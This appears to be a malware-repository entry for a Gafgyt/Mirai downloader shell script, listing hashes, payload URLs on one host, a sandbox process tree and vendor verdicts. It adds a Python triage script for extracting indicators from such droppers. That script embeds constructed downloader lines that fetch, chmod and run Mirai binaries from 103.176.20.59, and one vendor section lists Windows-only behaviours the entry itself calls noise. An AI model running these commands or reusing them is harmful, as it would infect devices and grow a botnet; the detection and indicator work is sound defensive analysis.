MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Gafgyt

Vendor detections: 7

SHA256 hash: 1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c
SHA3-384 hash: dd55cf2e09ef43247a2f780c7b47406f332784cdf6e910384107a47b647b121183f10ffffbd74080031c3f42443a79ec
SHA1 hash: 4c3a600f1cfcdb3c3d795fd578bda55d9e493ab8
MD5 hash: ce20721239b241ae14a94ca0f71209ec
humanhash: dakota-eighteen-mockingbird-north
File name: toto
Signature: Gafgyt
File size: 328 bytes
First seen: 2025-08-24 02:41:18 UTC
Last seen: 2025-08-24 17:20:15 UTC
File type: sh
MIME type: text/plain
ssdeep: 3:6SDiMLRJKTZFGBzSEyLTUWOqMLRJK88BzSE8eUrKKVMLRJKJSINXsFRKRqMLRJKF:5DBleCIm5l2KalbsPliLklIFa0LKiZ
TLSH: T116E04F8975D2E1FE89258E00F262173AD506F6C02160EF9CA64674758CDA5013124F47
Magika: txt
Reporter: abuse_ch
Tags: mirai sh
Related URLs (each fetched payload is its own MalwareBazaar entry):

URL                        Malware sample (SHA256 hash)                                        Signature  Tags
http://103.176.20.59/mips  7cd5fb5b6d94ac2acf16f8904f6f307f47710df1d51129d55e70590a52dcf823    Mirai      elf gafgyt mips mirai ua-wget
http://103.176.20.59/mpsl  e4acbf0a1448e928ea7714cf90692001c454b37d78b13a955f475568b36bbaec    Mirai      elf mips mirai ua-wget
http://103.176.20.59/arm4  8a235a9336092da5a5fd75dc7c04bf109a796cab8cbe52666f972c2c5f3ff285    Mirai      arm elf mirai ua-wget
http://103.176.20.59/arm5  16877e8cab68f6d6a557b0bee1e41a6d938997cb31a62cfe017ed21867b41801    Mirai      arm elf mirai ua-wget
http://103.176.20.59/arm7  0fd1878b69312fbf748d3be8ba65b3431083985fcfe65a3b32a74a8ef69cdf89    Mirai      arm elf mirai ua-wget

Intelligence

File Origin
# of uploads: 2
# of downloads: 45
Origin country: DE

Vendor Threat Intelligence
Verdict: Malicious
File Type: text
First seen: 2025-08-24T03:34:00Z UTC
Last seen: 2025-08-24T03:34:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph (process tree recovered from the sandbox trace):
- /usr/bin/sudo (pid 4047) --execve--> /tmp/sample.bin (pid 4056)
- /tmp/sample.bin (pid 4056) --execve--> /usr/bin/wget (pids 4058, 4417, 4501, 4677, 4930), tagged net, send-data, write-file
- /tmp/sample.bin (pid 4056) --execve--> /usr/bin/chmod (pids 4411, 4497, 4666, 4921, 5070)
- /tmp/sample.bin (pid 4056) --clone--> /usr/bin/dash (pids 4413, 4498, 4668, 4923, 5072)
- each of the five wget processes (4058, 4417, 4501, 4677, 4930) connects to 103.176.20.59:80 and sends 132B
The trace therefore shows five fetch, chmod, execute cycles against the same host, one per payload URL listed above.
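The process tree above (wget, then chmod, then a dash child, repeated five times against 103.176.20.59:80) is the standard multi-architecture downloader loop used by Mirai and Gafgyt droppers. The Python script below is an added illustration, not MalwareBazaar's code and not the malware's own code: it statically triages such a script by pulling out download URLs and hosts, guessing the target architecture from Mirai-style payload names (a heuristic assumption, not something the entry states), and flagging the fetch, chmod, execute pattern. The embedded script is constructed to match the URLs and behaviour this entry reports; it is not the contents of the 328-byte sample.

```python
"""Static triage of a Mirai/Gafgyt-style downloader shell script.

Added example. CONSTRUCTED_SCRIPT is made up to mirror the behaviour graph and
URL table of this entry; it is NOT the real sample's contents.
"""
import re
from urllib.parse import urlparse

# Constructed sample, not the real file: five wget -> chmod -> exec cycles
# against the host the sandbox trace shows.
CONSTRUCTED_SCRIPT = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://103.176.20.59/mips; chmod +x mips; ./mips; rm -rf mips
wget http://103.176.20.59/mpsl; chmod +x mpsl; ./mpsl; rm -rf mpsl
wget http://103.176.20.59/arm4; chmod +x arm4; ./arm4; rm -rf arm4
wget http://103.176.20.59/arm5; chmod +x arm5; ./arm5; rm -rf arm5
wget http://103.176.20.59/arm7; chmod +x arm7; ./arm7; rm -rf arm7
"""

URL_RE = re.compile(r"""(?:https?|tftp|ftp)://[^\s;'"|&)]+""")
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
# "./name" or "sh name" at the start of a line or right after ; & |
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)(?:\./\S+|sh\s+\S+)")
CLEANUP_RE = re.compile(r"\brm\s+(?:-rf?\s+)?\S+")

# Heuristic: common Mirai payload-name prefixes -> architecture. This is an
# assumption based on naming seen in the wild, not data from the entry.
ARCH_HINTS = [
    ("mpsl", "mipsel"), ("mips", "mips"), ("aarch64", "aarch64"), ("arm", "arm"),
    ("x86_64", "x86_64"), ("x86", "x86"), ("i686", "x86"), ("i586", "x86"),
    ("sh4", "sh4"), ("ppc", "powerpc"), ("m68k", "m68k"), ("spc", "sparc"),
    ("sparc", "sparc"),
]


def guess_arch(payload_name):
    """Map a payload file name to a target architecture, or 'unknown'."""
    lower = payload_name.lower()
    for prefix, arch in ARCH_HINTS:
        if lower.startswith(prefix):
            return arch
    return "unknown"


def extract_iocs(script):
    """Return ordered unique URLs, their hosts, and payload-name -> arch."""
    urls = list(dict.fromkeys(URL_RE.findall(script)))
    hosts = list(dict.fromkeys(urlparse(u).hostname for u in urls))
    arch = {u.rsplit("/", 1)[-1]: guess_arch(u.rsplit("/", 1)[-1]) for u in urls}
    return {"urls": urls, "hosts": hosts, "arch": arch}


def count_stages(script):
    """Count fetch / chmod / exec / cleanup commands, line by line."""
    counts = {"fetch": 0, "chmod": 0, "exec": 0, "cleanup": 0}
    for line in script.splitlines():
        counts["fetch"] += len(FETCH_RE.findall(line))
        counts["chmod"] += len(CHMOD_RE.findall(line))
        counts["exec"] += len(EXEC_RE.findall(line))
        counts["cleanup"] += len(CLEANUP_RE.findall(line))
    return counts


def triage(script):
    """Combine IOC extraction with a downloader verdict.

    A script that fetches remote content, marks it executable and runs it is
    treated as a downloader; fan-out to several architectures is the
    Mirai/Gafgyt signature seen in this entry's URL table.
    """
    iocs = extract_iocs(script)
    stages = count_stages(script)
    is_downloader = all(stages[k] > 0 for k in ("fetch", "chmod", "exec"))
    archs = {a for a in iocs["arch"].values() if a != "unknown"}
    return {**iocs, "stages": stages, "is_downloader": is_downloader,
            "multi_arch": len(archs) > 1}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(CONSTRUCTED_SCRIPT), indent=2))
```

Run it on a real downloader by replacing CONSTRUCTED_SCRIPT with the file's contents; the URL and host lists are the IOCs to block, and the per-stage counts should line up with the number of wget and chmod processes in a sandbox trace like the one above (five each here).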
Threat name: Linux.Worm.Mirai
Status: Malicious
First seen: 2025-08-24 03:12:10 UTC
File Type: Text (Shell)
AV detection: 10 of 24 (41.67%)
Threat level: 5/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Enumerates physical storage devices
(These three behaviour tags are Windows-specific, and a Linux shell script cannot call SetWindowsHookEx or touch a registry; treat them as sandbox noise rather than observed behaviour of this sample.)
Please note that we are no longer able to provide a coverage score for Virus Total.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Delivery       Signature  File type  SHA256
Web download   Gafgyt     sh         1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c (this sample)

Delivery method: Distributed via web download

Comments